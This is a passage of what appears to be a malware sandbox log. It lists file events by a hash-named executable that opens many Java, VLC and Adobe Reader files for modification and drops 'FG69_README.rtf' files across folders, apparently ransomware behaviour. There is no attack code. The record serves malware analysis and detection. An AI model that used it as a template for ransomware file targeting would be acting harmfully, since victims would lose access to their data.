Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Bucharest d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.text.nl_ja_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-favorites.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\AssemblyInfoInternal.zip d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Chatham d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\classlist d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jetty.server_8.1.14.v20131031.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\COPYRIGHT d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\javax.servlet.jsp_2.2.0.v201112011158.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Antarctica\DumontDUrville d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\jawt.h d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\cmm\GRAY.pf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-io-ui_zh_CN.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\an\LC_MESSAGES\vlc.mo d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jre7\lib\zi\Asia\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\LucidaTypewriterRegular.ttf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jstat.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface.nl_ja_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-tools_ja.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Sitka d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Guyana d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Taipei d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-heapdump.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Norfolk d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jinfo.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\servertool.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\intf\dummy.luac d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\twitch.luac d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.ui.ja_5.5.0.165303.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-execution_zh_CN.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-oql.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.batik.util_1.7.0.v201011041433.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\Azores d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler_ja.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+10 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Indian\Mahe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\sl\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Taipei d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.frameworkadmin.nl_ja_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Kwajalein d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Montreal d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Bougainville d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jre7\lib\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\SetupMetrics\20200723104606.pma d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.jdp_5.5.0.165303.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-api.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Tunis d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\wsimport.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\zh_CN\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\META-INF\ECLIPSE_.SF d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-lib-profiler-charts.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Godthab d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.di_1.0.0.v20140328-2112.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_default_win7.css d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-host-views_zh_CN.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\AboutBox.zip d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\EET d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-awt_zh_CN.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\THIRDPARTYLICENSEREADME.txt d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-compat_zh_CN.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.ui_5.5.0.165303.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.addons.swt.nl_zh_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-swing-tabcontrol_ja.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Aqtobe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Bold.otf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-BoldIt.otf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\startNetworkServer d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4-dark.css d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-nodes.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Amsterdam d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\it\LC_MESSAGES\vlc.mo d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_same_reviewers.gif d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Indian\Reunion d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Tongatapu d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Nairobi d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Iqaluit d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\messages_zh_CN.properties d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Guayaquil d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Oblique.otf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\license.html d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\ir.idl d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\META-INF\ECLIPSE_.RSA d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\pack200.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Indiana\Knox d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\META-INF\ECLIPSE_.RSA d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoAcq.dll.mui d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\about.html d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface.text.nl_ja_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.browser.jdp.zh_CN_5.5.0.165303.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\cmm\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Gambier d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\LogTransport2.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.syntheticattribute.exsd d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\META-INF\MANIFEST.MF d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-5 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Indian\Reunion d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\fa\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-uihandler.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Monrovia d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Aqtau d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-uisupport_zh_CN.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\default_apps\external_extensions.json d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\THIRDPARTYLICENSEREADME-JAVAFX.txt d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\tet\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\jabswitch.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Kentucky\Monticello d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.browser.attach.zh_CN_5.5.0.165303.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-modules-profiler.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\ga\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\meta\art\02_frenchtv.luac d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Ashgabat d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ecf.identity_3.4.0.v20140827-1444.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\org-netbeans-modules-profiler_visualvm.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\Sybase.xsl d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.core.di_1.4.0.v20140414-1837.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\SY______.PFB d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\dialogs\offset_window.html d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Thimphu d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\LucidaBrightDemiBold.ttf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.transport.ecf_1.1.0.v20140408-1354.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Mozilla Maintenance Service\Uninstall.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-swing-tabcontrol.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_ffd27a_256x240.png d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prcr.x3d d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.forms_3.6.100.v20140422-1825.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_zh_TW.properties d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\sr\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\epl-v10.html d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jre7\lib\zi\Europe\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ICELAND.TXT d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\fontconfig.properties.src d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT-4 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Lima d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.configuration_5.5.0.165303.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-lib-uihandler.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateCore.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-core-output2.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\bs\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\mr\LC_MESSAGES\FG69_README.rtf 